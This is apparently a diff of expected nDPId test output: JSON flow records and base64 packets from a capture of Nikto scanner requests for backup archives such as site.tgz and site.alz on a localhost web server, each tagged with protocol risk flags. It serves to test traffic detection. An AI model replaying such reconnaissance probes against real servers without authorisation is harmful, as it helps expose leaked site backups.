(Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":315,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277177,"flow_last_seen":1576420277177,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277177,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50174,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":316,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277179,"flow_last_seen":1576420277179,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277179,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50176,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":316,"flow_packet_id":1,"flow_last_seen":1576420277179,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420277179,"pkt":"AAAAAAAAAAAAAAAACABFAADAZxxAAEAG1Rl\/AAABfwAAAcQAH5BgPl+VSob0sYAYAED+tAAAAQEICp1m\/OOdZvzjR0VUIC9zaXRlLmFseiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":316,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277179,"flow_last_seen":1576420277179,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277179,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50176,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":316,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277179,"flow_last_seen":1576420277179,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277179,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50176,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":317,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277180,"flow_last_seen":1576420277180,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420277180,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50178,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":317,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":317,"flow_packet_id":1,"flow_last_seen":1576420277180,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"ts_msec":1576420277180,"pkt":"AAAAAAAAAAAAAAAACABFAADGTHlAAEAG77Z\/AAABfwAAAcQCH5A4KXT5upP6C4AYAED+ugAAAQEICp1m\/OSdZvzkR0VUIC8xMjcuMC50YXIubHptYSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":317,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277180,"flow_last_seen":1576420277180,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420277180,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50178,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":317,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277180,"flow_last_seen":1576420277180,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420277180,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50178,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":318,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277183,"flow_last_seen":1576420277183,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420277183,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50180,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":318,"flow_packet_id":1,"flow_last_seen":1576420277183,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"ts_msec":1576420277183,"pkt":"AAAAAAAAAAAAAAAACABFAADGDUpAAEAGLuZ\/AAABfwAAAcQEH5BEmzXIVOhE3IAYAED+ugAAAQEICp1m\/OadZvzmR0VUIC8xMjcuMC50YXIubHptYSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":318,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277183,"flow_last_seen":1576420277183,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420277183,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50180,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":318,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277183,"flow_last_seen":1576420277183,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420277183,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50180,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":319,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277184,"flow_last_seen":1576420277184,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277184,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50182,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":319,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":319,"flow_packet_id":1,"flow_last_seen":1576420277184,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420277184,"pkt":"AAAAAAAAAAAAAAAACABFAADAdAhAAEAGyC1\/AAABfwAAAcQGH5BYeUyXBV+uwoAYAED+tAAAAQEICp1m\/OidZvzoR0VUIC9zaXRlLnRneiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":319,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277184,"flow_last_seen":1576420277184,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277184,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50182,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":319,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277184,"flow_last_seen":1576420277184,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277184,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50182,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":320,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277185,"flow_last_seen":1576420277185,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277185,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50184,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":320,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":320,"flow_packet_id":1,"flow_last_seen":1576420277185,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420277185,"pkt":"AAAAAAAAAAAAAAAACABFAADACsVAAEAGMXF\/AAABfwAAAcQIH5AHdTJUhgOj64AYAED+tAAAAQEICp1m\/OmdZvzpR0VUIC9zaXRlLnRneiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":320,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277185,"flow_last_seen":1576420277185,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277185,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50184,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":320,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277185,"flow_last_seen":1576420277185,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277185,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50184,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":321,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277186,"flow_last_seen":1576420277186,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420277186,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50186,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":321,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":321,"flow_packet_id":1,"flow_last_seen":1576420277186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"ts_msec":1576420277186,"pkt":"AAAAAAAAAAAAAAAACABFAADEtSBAAEAGhxF\/AAABfwAAAcQKH5BCRY2PbjuWH4AYAED+uAAAAQEICp1m\/OqdZvzqR0VUIC8xMjcudGFyLmx6bWEgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":321,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277186,"flow_last_seen":1576420277186,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420277186,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50186,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":321,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277186,"flow_last_seen":1576420277186,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420277186,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50186,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":322,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277187,"flow_last_seen":1576420277187,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420277187,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50188,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":322,"flow_packet_id":1,"flow_last_seen":1576420277187,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"ts_msec":1576420277187,"pkt":"AAAAAAAAAAAAAAAACABFAADEwZ1AAEAGepR\/AAABfwAAAcQMH5B2JfkLbDSLWoAYAED+uAAAAQEICp1m\/OudZvzrR0VUIC8xMjcudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":322,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277187,"flow_last_seen":1576420277187,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420277187,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50188,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":322,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277187,"flow_last_seen":1576420277187,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420277187,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50188,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":323,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277189,"flow_last_seen":1576420277189,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277189,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50190,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":323,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":323,"flow_packet_id":1,"flow_last_seen":1576420277189,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420277189,"pkt":"AAAAAAAAAAAAAAAACABFAADAxaRAAEAGdpF\/AAABfwAAAcQOH5BgW\/00es\/TMYAYAED+tAAAAQEICp1m\/O2dZvztR0VUIC8xMjcwLmFseiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":323,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277189,"flow_last_seen":1576420277189,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277189,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50190,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
